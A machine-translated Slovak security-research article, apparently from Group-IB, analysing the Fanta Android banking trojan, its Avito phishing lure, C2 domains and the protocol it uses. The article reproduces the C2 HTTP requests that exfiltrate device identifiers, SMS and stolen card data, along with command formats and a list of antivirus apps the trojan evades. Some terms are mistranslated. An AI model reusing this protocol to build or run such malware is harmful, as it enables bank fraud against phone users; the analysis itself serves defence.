🥇Leisya, Fanta: nová taktika starého Android Trojan

Jedného dňa budete chcieť niečo predať na Avito a po zverejnení podrobného popisu vášho produktu (napríklad modul RAM) dostanete túto správu:

Po otvorení odkazu sa vám zobrazí zdanlivo neškodná stránka, ktorá vás, šťastného a úspešného predajcu, upozorní, že bol uskutočnený nákup:

Po kliknutí na tlačidlo „Pokračovať“ sa do vášho zariadenia s Androidom stiahne súbor APK s ikonou a názvom vzbudzujúcim dôveru. Nainštalovali ste aplikáciu, ktorá z nejakého dôvodu požadovala práva AccessibilityService, potom sa objavilo niekoľko okien, ktoré rýchlo zmizli a... To je všetko.

Idete skontrolovať svoj zostatok, ale z nejakého dôvodu si vaša banková aplikácia znova vypýta údaje o vašej karte. Po zadaní údajov sa stane niečo hrozné: z nejakého dôvodu, ktorý vám stále nie je jasný, začnú z vášho účtu miznúť peniaze. Pokúšate sa vyriešiť problém, ale váš telefón odoláva: stlačí klávesy „Späť“ a „Domov“, nevypne sa a nedovolí vám aktivovať žiadne bezpečnostné opatrenia. Výsledkom je, že ste zostali bez peňazí, váš tovar nebol zakúpený, ste zmätení a pýtate sa: čo sa stalo?

Odpoveď je jednoduchá: stali ste sa obeťou Android Trojan Fanta, člena rodiny Flexnet. Ako sa to stalo? Poďme si to teraz vysvetliť.

Autori: Andrej Polovinkin, junior špecialista na analýzu malvéru, Ivan Pisarev, špecialista na analýzu malvéru.

Niektoré štatistiky

Rodina Flexnet trójskych koní Android sa prvýkrát stala známou už v roku 2015. Počas pomerne dlhého obdobia činnosti sa rodina rozšírila na niekoľko poddruhov: Fanta, Limebot, Lipton atď. Trójsky kôň, ako aj infraštruktúra s ním spojená, nestoja: vyvíjajú sa nové efektívne distribučné schémy – v našom prípade kvalitné phishingové stránky zamerané na konkrétneho používateľa-predajcu a vývojári trójskych koní sledujú módne trendy v písanie vírusov – pridanie novej funkcionality, ktorá umožňuje efektívnejšie kradnúť peniaze z infikovaných zariadení a obísť ochranné mechanizmy.

Kampaň opísaná v tomto článku je zameraná na používateľov z Ruska, malý počet infikovaných zariadení zaznamenali na Ukrajine a ešte menej v Kazachstane a Bielorusku.

Aj keď je Flexnet v aréne trójskych koní pre Android už viac ako 4 roky a podrobne ho študovali mnohí výskumníci, stále je v dobrom stave. Od januára 2019 je potenciálna výška škody viac ako 35 miliónov rubľov - a to len pre kampane v Rusku. V roku 2015 sa na podzemných fórach predávali rôzne verzie tohto trójskeho koňa s Androidom, kde sa dal nájsť aj zdrojový kód trójskeho koňa s podrobným popisom. To znamená, že štatistiky škôd vo svete sú ešte pôsobivejšie. Nie je to zlý ukazovateľ pre takého starého muža, však?

Od predaja po klamstvo

Ako je zrejmé z predtým prezentovanej snímky phishingovej stránky pre internetovú službu Avito na zverejňovanie reklám, bola pripravená pre konkrétnu obeť. Útočníci zrejme používajú jeden zo syntaktických analyzátorov Avito, ktorý extrahuje telefónne číslo a meno predajcu, ako aj popis produktu. Po rozbalení stránky a príprave APK súboru je obeti zaslaná SMS s jej menom a odkazom na phishingovú stránku s popisom jej produktu a sumou získanou z „predaja“ produktu. Kliknutím na tlačidlo dostane používateľ škodlivý APK súbor - Fanta.

Štúdia domény shcet491[.]ru ukázala, že je delegovaná na servery DNS spoločnosti Hostinger:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Súbor zóny domény obsahuje položky smerujúce na adresy IP 31.220.23[.]236, 31.220.23[.]243 a 31.220.23[.]235. Záznam primárneho prostriedku domény (záznam A) však ukazuje na server s adresou IP 178.132.1[.]240.

IP adresa 178.132.1[.]240 sa nachádza v Holandsku a patrí hostiteľovi WorldStream. IP adresy 31.220.23[.]235, 31.220.23[.]236 a 31.220.23[.]243 sa nachádzajú vo Veľkej Británii a patria zdieľanému hostingovému serveru HOSTINGER. Používa sa ako záznamník openprov-ru. Nasledujúce domény boli tiež preložené na IP adresu 178.132.1[.]240:

sdelka-ru[.]ru
tovar-av[.]ru
av-tovar[.]ru
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Treba poznamenať, že odkazy v nasledujúcom formáte boli dostupné takmer zo všetkých domén:

http://(www.){0,1}<%domain%>/[0-9]{7}

Táto šablóna obsahuje aj odkaz zo správy SMS. Na základe historických údajov sa zistilo, že jedna doména zodpovedá niekoľkým odkazom vo vzore opísanom vyššie, čo naznačuje, že jedna doména bola použitá na distribúciu trójskeho koňa niekoľkým obetiam.

Poďme trochu dopredu: Trójsky kôň stiahnutý prostredníctvom odkazu z SMS používa adresu ako riadiaci server onusedseddohap[.]klub. Táto doména bola zaregistrovaná 2019-03-12 a od 2019-04-29 interagovali aplikácie APK s touto doménou. Na základe údajov získaných z VirusTotal interagovalo s týmto serverom celkovo 109 aplikácií. Samotná doména sa preložila na IP adresu 217.23.14[.]27, ktorá sa nachádza v Holandsku a je vo vlastníctve hostiteľa WorldStream. Používa sa ako záznamník NameCheap. Na túto IP adresu sú preložené aj domény bad-racoon[.]klub (od 2018) a bad-racoon[.]naživo (od 2018). S doménou bad-racoon[.]klub interagovalo s viac ako 80 súbormi APK bad-racoon[.]naživo - viac ako 100.

Vo všeobecnosti útok prebieha takto:

Čo je pod viečkom Fanty?

Rovnako ako mnoho iných trójskych koní Android, Fanta je schopná čítať a odosielať SMS správy, vytvárať požiadavky USSD a zobrazovať svoje vlastné okná nad aplikáciami (vrátane bankových). Prišiel však arzenál funkčnosti tejto rodiny: Fanta začala používať Služba dostupnosti na rôzne účely: čítanie obsahu upozornení z iných aplikácií, zabránenie odhaleniu a zastavenie spustenia trójskeho koňa na infikovanom zariadení atď. Fanta funguje na všetkých verziách Androidu mladších ako 4.4. V tomto článku sa bližšie pozrieme na nasledujúcu Fanta vzorku:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Hneď po spustení

Ihneď po spustení skryje trójsky kôň svoju ikonu. Aplikácia môže fungovať iba vtedy, ak názov infikovaného zariadenia nie je v zozname:

android_x86
VirtualBox
Nexus 5X (hlava)
Nexus 5 (holiaci strojček)

Táto kontrola sa vykonáva v hlavnej službe Trojan - MainService. Pri prvom spustení sa konfiguračné parametre aplikácie inicializujú na predvolené hodnoty (formát pre ukladanie konfiguračných údajov a ich význam bude popísaný neskôr) a na riadiacom serveri sa zaregistruje nové infikované zariadenie. Požiadavka HTTP POST s typom správy bude odoslaná na server register_bot a informácie o infikovanom zariadení (verzia Androidu, IMEI, telefónne číslo, meno operátora a kód krajiny, v ktorej je operátor registrovaný). Adresa slúži ako riadiaci server hXXp://onuseddohap[.]club/controller.php. Ako odpoveď server odošle správu obsahujúcu polia bot_id, bot_pwd, server — aplikácia uloží tieto hodnoty ako parametre servera CnC. Parameter server voliteľné, ak pole nebolo prijaté: Fanta používa registračnú adresu - hXXp://onuseddohap[.]club/controller.php. Funkciu zmeny CnC adresy je možné použiť na vyriešenie dvoch problémov: rovnomerné rozloženie záťaže medzi viacero serverov (pri veľkom počte infikovaných zariadení môže byť záťaž na neoptimalizovanom webovom serveri vysoká) a tiež použitie alternatívy servera v prípade zlyhania jedného z CnC serverov.

Ak sa pri odosielaní požiadavky vyskytne chyba, trójsky kôň zopakuje proces registrácie po 20 sekundách.

Po úspešnej registrácii zariadenia Fanta zobrazí používateľovi nasledujúcu správu:

Dôležité upozornenie: volaná služba Zabezpečenie systému — názov služby trójskeho koňa a po kliknutí na tlačidlo ОК Otvorí sa okno s nastaveniami prístupnosti infikovaného zariadenia, kde musí používateľ udeliť práva na prístupnosť pre škodlivú službu:

Hneď ako sa používateľ zapne Služba dostupnosti, Fanta získa prístup k obsahu okien aplikácií a akciám, ktoré sa v nich vykonávajú:

Ihneď po získaní práv na prístupnosť si trójsky kôň vyžiada administrátorské práva a práva na čítanie upozornení:

Pomocou AccessibilityService aplikácia simuluje stlačenie klávesov, čím si dáva všetky potrebné práva.

Fanta vytvára viacero databázových inštancií (ktoré budú popísané neskôr) potrebných na uloženie konfiguračných údajov, ako aj informácií zhromaždených v procese o infikovanom zariadení. Na odoslanie zhromaždených informácií vytvorí trójsky kôň opakujúcu sa úlohu určenú na stiahnutie polí z databázy a prijatie príkazu z riadiaceho servera. Interval prístupu k CnC je nastavený v závislosti od verzie Androidu: v prípade 5.1 bude interval 10 sekúnd, inak 60 sekúnd.

Na prijatie príkazu Fanta požiada GetTask na správcovský server. Ako odpoveď môže CnC poslať jeden z nasledujúcich príkazov:

Tím	Popis
0	Odoslať SMS správu
1	Uskutočnite telefonický hovor alebo príkaz USSD
2	Aktualizuje parameter interval
3	Aktualizuje parameter zachytiť
6	Aktualizuje parameter smsManager
9	Začnite zbierať SMS správy
11	Obnovte výrobné nastavenia telefónu
12	Povoliť/zakázať zaznamenávanie vytvárania dialógového okna

Fanta tiež zbiera upozornenia zo 70 bankových aplikácií, rýchlych platobných systémov a elektronických peňaženiek a ukladá ich do databázy.

Ukladanie konfiguračných parametrov

Na ukladanie konfiguračných parametrov používa Fanta štandardný prístup pre platformu Android - predvoľby-súbory. Nastavenia sa uložia do súboru s názvom nastavenie. Popis uložených parametrov je v tabuľke nižšie.

názov	Predvolená hodnota	Možné hodnoty	Popis
id	0	Celé číslo	ID robota
server	hXXp://onuseddohap[.]klub/	URL	Adresa riadiaceho servera
pwd	-	Reťazec	Heslo servera
interval	20	Celé číslo	Časový interval. Označuje, ako dlho by sa mali odložiť nasledujúce úlohy: Pri odosielaní žiadosti o stav odoslanej SMS správy Prijímanie nového príkazu z riadiaceho servera
zachytiť	všetko	všetko/telNumber	Ak sa pole rovná reťazcu všetko alebo telNumber, potom bude prijatá SMS správa zachytená aplikáciou a nebude zobrazená používateľovi
smsManager	0	0/1	Povoliť/zakázať aplikáciu ako predvoleného príjemcu SMS
readDialog	nepravdivý	Pravda lož	Povoliť/zakázať protokolovanie udalostí AccessibilityEvent

Fanta tiež používa súbor smsManager:

názov	Predvolená hodnota	Možné hodnoty	Popis
pckg	-	Reťazec	Názov použitého správcu SMS správ

Interakcia s databázami

Trójsky kôň pri svojej činnosti využíva dve databázy. Databáza pomenovaná a slúži na ukladanie rôznych informácií zhromaždených z telefónu. Druhá databáza je pomenovaná fanta.db a používa sa na uloženie nastavení zodpovedných za vytváranie phishingových okien určených na zhromažďovanie informácií o bankových kartách.

Trojan používa databázu а na ukladanie zhromaždených informácií a zaznamenávanie vašich akcií. Údaje sú uložené v tabuľke Záznamy. Na vytvorenie tabuľky použite nasledujúci SQL dotaz:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Databáza obsahuje nasledujúce informácie:

1. Zaznamenanie spustenia infikovaného zariadenia pomocou správy Telefón sa zapol!

2. Upozornenia z aplikácií. Správa sa generuje podľa nasledujúcej šablóny:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Údaje o bankových kartách z phishingových formulárov vytvorených trójskym koňom. Parameter VIEW_NAME môže byť jedno z nasledujúcich:

Aliexpress
AVITA
Google Play
Rôzne <%App Name%>

Správa sa zaprotokoluje vo formáte:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Prichádzajúce/odchádzajúce SMS správy vo formáte:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informácie o balíku, ktorý vytvára dialógové okno, vo formáte:

(<%Package name%>)<%Package information%>

Príklad tabuľky Záznamy:

Jednou z funkcií Fanta je zhromažďovanie informácií o bankových kartách. Zber údajov prebieha prostredníctvom vytvárania phishingových okien pri otváraní bankových aplikácií. Trójsky kôň vytvorí phishingové okno iba raz. Informácie o tom, že sa okno zobrazilo používateľovi, sú uložené v tabuľke nastavenie v databáze fanta.db. Na vytvorenie databázy použite nasledujúci SQL dotaz:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Všetky polia tabuľky nastavenie predvolene inicializované na 1 (vytvoriť phishingové okno). Po zadaní údajov používateľom sa hodnota nastaví na 0. Príklad polí tabuľky nastavenie:

can_login — pole je zodpovedné za zobrazenie formulára pri otváraní bankovej aplikácie
prvá_banka - nepoužité
can_avito — pole je zodpovedné za zobrazenie formulára pri otvorení aplikácie Avito
can_ali — pole je zodpovedné za zobrazenie formulára pri otvorení aplikácie Aliexpress
môže_iný — pole je zodpovedné za zobrazenie formulára pri otvorení akejkoľvek aplikácie zo zoznamu: Yula, Pandao, Drom Auto, Peňaženka. Zľavové a bonusové karty, Aviasales, Booking, Trivago
can_card — pole je zodpovedné za zobrazenie formulára pri otváraní Google Play

Interakcia s riadiacim serverom

Sieťová interakcia s riadiacim serverom prebieha prostredníctvom protokolu HTTP. Na prácu so sieťou Fanta využíva obľúbenú knižnicu Retrofit. Žiadosti sa posielajú na adresu: hXXp://onuseddohap[.]club/controller.php. Adresu servera je možné zmeniť pri registrácii na serveri. Ako odpoveď zo servera môžu byť odoslané súbory cookie. Fanta odošle serveru nasledujúce požiadavky:

Registrácia robota na riadiacom serveri sa uskutoční raz, pri prvom spustení. Na server sa odošlú nasledujúce údaje o infikovanom zariadení:
· sušienka — súbory cookie prijaté zo servera (predvolená hodnota je prázdny reťazec)
· spôsob — strunová konštanta register_bot
· prefix — celočíselná konštanta 2
· version_sdk — je vytvorený podľa tejto šablóny: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI infikovaného zariadenia
· krajiny — kód krajiny, v ktorej je prevádzkovateľ zaregistrovaný, vo formáte ISO
· číslo - telefónne číslo
· prevádzkovateľ — meno operátora

Príklad požiadavky odoslanej na server:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
Ako odpoveď na požiadavku musí server vrátiť objekt JSON obsahujúci nasledujúce parametre:
· bot_id — ID infikovaného zariadenia. Ak sa bot_id rovná 0, Fanta znova vykoná požiadavku.
bot_pwd — heslo pre server.
server — adresa riadiaceho servera. Voliteľný parameter. Ak parameter nie je zadaný, použije sa adresa uložená v aplikácii.

Príklad objektu JSON:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Žiadosť o prijatie príkazu zo servera. Na server sa odosielajú nasledujúce údaje:
· sušienka — cookies prijaté zo servera
· ponuka — ID infikovaného zariadenia, ktoré bolo prijaté pri odosielaní požiadavky register_bot
· pwd —heslo pre server
· divice_admin — pole určuje, či boli získané práva správcu. Ak ste získali práva správcu, pole sa rovná 1, inak 0
· Prístupnosť — Stav prevádzky služby dostupnosti. Ak bola služba spustená, hodnota je 1, inak 0
· SMSManager — zobrazuje, či je trójsky kôň povolený ako predvolená aplikácia na príjem SMS
· plátno — zobrazuje, v akom stave je obrazovka. Hodnota bude nastavená 1, ak je obrazovka zapnutá, inak 0;

Príklad požiadavky odoslanej na server:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
V závislosti od príkazu môže server vrátiť objekt JSON s rôznymi parametrami:

· Tím Odoslať SMS správu: Parametre obsahujú telefónne číslo, text SMS správy a ID odosielanej správy. Identifikátor sa používa pri odosielaní správy na server s typom setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· Tím Uskutočnite telefonický hovor alebo príkaz USSD: Telefónne číslo alebo príkaz sa nachádza v tele odpovede.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· Tím Zmena parametra intervalu.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· Tím Zmeňte parameter zachytenia.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· Tím Zmeňte pole SmsManager.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· Tím Zbierajte SMS správy z infikovaného zariadenia.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· Tím Obnovte výrobné nastavenia telefónu:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· Tím Zmeňte parameter ReadDialog.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Odoslanie správy s typom setSmsStatus. Táto požiadavka je vykonaná po vykonaní príkazu Odoslať SMS správu. Žiadosť vyzerá takto:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Nahrávanie obsahu databázy. Na každú požiadavku sa prenáša jeden riadok. Na server sa odosielajú nasledujúce údaje:
· sušienka — cookies prijaté zo servera
· spôsob — strunová konštanta setSaveInboxSms
· ponuka — ID infikovaného zariadenia, ktoré bolo prijaté pri odosielaní požiadavky register_bot
· text — text v aktuálnom zázname databázy (pole d od stola Záznamy v databáze а)
· číslo — názov aktuálneho záznamu v databáze (pole p od stola Záznamy v databáze а)
· sms_mode — celočíselná hodnota (pole m od stola Záznamy v databáze а)

Žiadosť vyzerá takto:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
V prípade úspešného odoslania na server sa riadok z tabuľky vymaže. Príklad objektu JSON vráteného serverom:
```
{
    "response":[],
    "status":"ok"
}
```

Interakcia so službou AccessibilityService

AccessibilityService bola implementovaná s cieľom zjednodušiť používanie zariadení Android pre ľudí so zdravotným postihnutím. Vo väčšine prípadov je na interakciu s aplikáciou potrebná fyzická interakcia. AccessibilityService vám ich umožňuje vykonávať programovo. Fanta pomocou služby vytvára falošné okná v bankových aplikáciách a zabraňuje používateľom otvárať systémové nastavenia a niektoré aplikácie.

Pomocou funkcionality AccessibilityService trójsky kôň monitoruje zmeny prvkov na obrazovke infikovaného zariadenia. Ako už bolo popísané vyššie, nastavenia Fanta obsahujú parameter zodpovedný za protokolovanie operácií s dialógovými oknami - readDialog. Ak je tento parameter nastavený, do databázy sa pridajú informácie o názve a popise balíka, ktorý spustil udalosť. Trójsky kôň pri spustení udalostí vykoná nasledujúce akcie:

Simuluje stlačenie tlačidiel späť a domov v nasledujúcich prípadoch:
· ak chce používateľ reštartovať svoje zariadenie
· ak chce používateľ vymazať aplikáciu „Avito“ alebo zmeniť prístupové práva
· ak je na stránke zmienka o aplikácii „Avito“.
· pri otvorení aplikácie Google Play Protect
· pri otváraní stránok s nastaveniami AccessibilityService
· keď sa zobrazí dialógové okno Zabezpečenie systému
· pri otvorení stránky s nastaveniami „Nakresliť cez inú aplikáciu“.
· pri otvorení stránky „Aplikácie“, „Obnova a reset“, „Obnovenie údajov“, „Obnovenie nastavení“, „Panel pre vývojárov“, „Špeciálne. príležitosti“, „Špeciálne príležitosti“, „Špeciálne práva“
· ak udalosť vygenerovali určité aplikácie.

Zoznam aplikácií
- robot
- Master Lite
- Clean Master
- Clean Master pre x86 CPU
- Správa povolení aplikácií Meizu
- Zabezpečenie MIUI
- Clean Master - Antivírus a čistič vyrovnávacej pamäte a odpadu
- Rodičovská kontrola a GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivírus a bezplatná ochrana 2019
- Mobilné zabezpečenie MegaFon
- AVG Protection pre Xperia
- Mobilná bezpečnosť
- Antivírus a ochrana proti malwarebytes
- Antivírus pre Android 2019
- Security Master - Antivírus, VPN, AppLock, Booster
- Antivírus AVG pre tablet Huawei System Manager
- Dostupnosť Samsung
- Samsung Smart Manager
- Bezpečnostný majster
- Speed Booster
- Dr.Web
- Bezpečnostný priestor Dr.Web
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivírusová a mobilná bezpečnosť
- Kaspersky Internet Security: Antivírus a ochrana
- Životnosť batérie Kaspersky: Saver & Booster
- Kaspersky Endpoint Security - ochrana a správa
- AVG Antivírus zadarmo 2019 - ochrana pre Android
- antivírus pre Android
- Norton Mobile Security a antivírus
- Antivírus, firewall, VPN, mobilná bezpečnosť
- Mobilná bezpečnosť: antivírus, VPN, ochrana proti krádeži
- Antivírus pre Android
Ak sa pri odosielaní SMS správy na krátke číslo požaduje povolenie, Fanta simuluje kliknutie na zaškrtávacie políčko Zapamätajte si výber a tlačidlo send.
Keď sa pokúsite odobrať trójskemu koňovi práva správcu, obrazovka telefónu sa uzamkne.
Zabraňuje pridávaniu nových správcov.
Ak antivírusová aplikácia dr.web zistil hrozbu, Fanta napodobňuje stlačenie tlačidla ignorovať.
Trójsky kôň simuluje stlačenie tlačidla späť a domov, ak udalosť vygenerovala aplikácia Starostlivosť o zariadenia Samsung.
Fanta vytvára phishingové okná s formulármi na zadávanie informácií o bankových kartách, ak bola spustená aplikácia zo zoznamu asi 30 rôznych internetových služieb. Medzi nimi: AliExpress, Booking, Avito, komponent trhu Google Play, Pandao, Drom Auto atď.

Phishingové formuláre

Fanta analyzuje, ktoré aplikácie sú spustené na infikovanom zariadení. Ak bola otvorená aplikácia, ktorá vás zaujíma, trójsky kôň zobrazí nad všetkými ostatnými phishingové okno, čo je formulár na zadanie informácií o bankovej karte. Používateľ musí zadať nasledujúce údaje:
- Číslo karty
- Dátum vypršania platnosti karty
- CVV
- Meno držiteľa karty (nie pre všetky banky)
V závislosti od spustenej aplikácie sa zobrazia rôzne phishingové okná. Nižšie sú uvedené príklady niektorých z nich:

AliExpress:

Avito:

Pre niektoré iné aplikácie, napr. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Ako to naozaj bolo

Našťastie sa ukázalo, že človek, ktorý dostal SMS správu opísanú na začiatku článku, je špecialista na kybernetickú bezpečnosť. Preto sa skutočná verzia, ktorá nie je režisérom, líši od tej, ktorá bola uvedená skôr: človek dostal zaujímavú SMS, po ktorej ju dal tímu Group-IB Threat Hunting Intelligence. Výsledkom útoku je tento článok. Šťastný koniec, však? Nie všetky príbehy sa však končia tak úspešne a aby ten váš nevyzeral ako režisérsky zostrih s prehrou peňazí, vo väčšine prípadov stačí dodržať tieto dlho opísané pravidlá:
- neinštalujte aplikácie pre mobilné zariadenie s OS Android z iných zdrojov ako zo služby Google Play
- Pri inštalácii aplikácie venujte zvláštnu pozornosť právam, ktoré aplikácia požaduje
- dávajte pozor na prípony stiahnutých súborov
- pravidelne inštalujte aktualizácie operačného systému Android
- nenavštevujte podozrivé zdroje a nesťahujte odtiaľ súbory
- Neklikajte na odkazy prijaté v SMS správach.

Zdroj: hab.com

Leisya, Fanta: nová taktika starého trójskeho koňa Android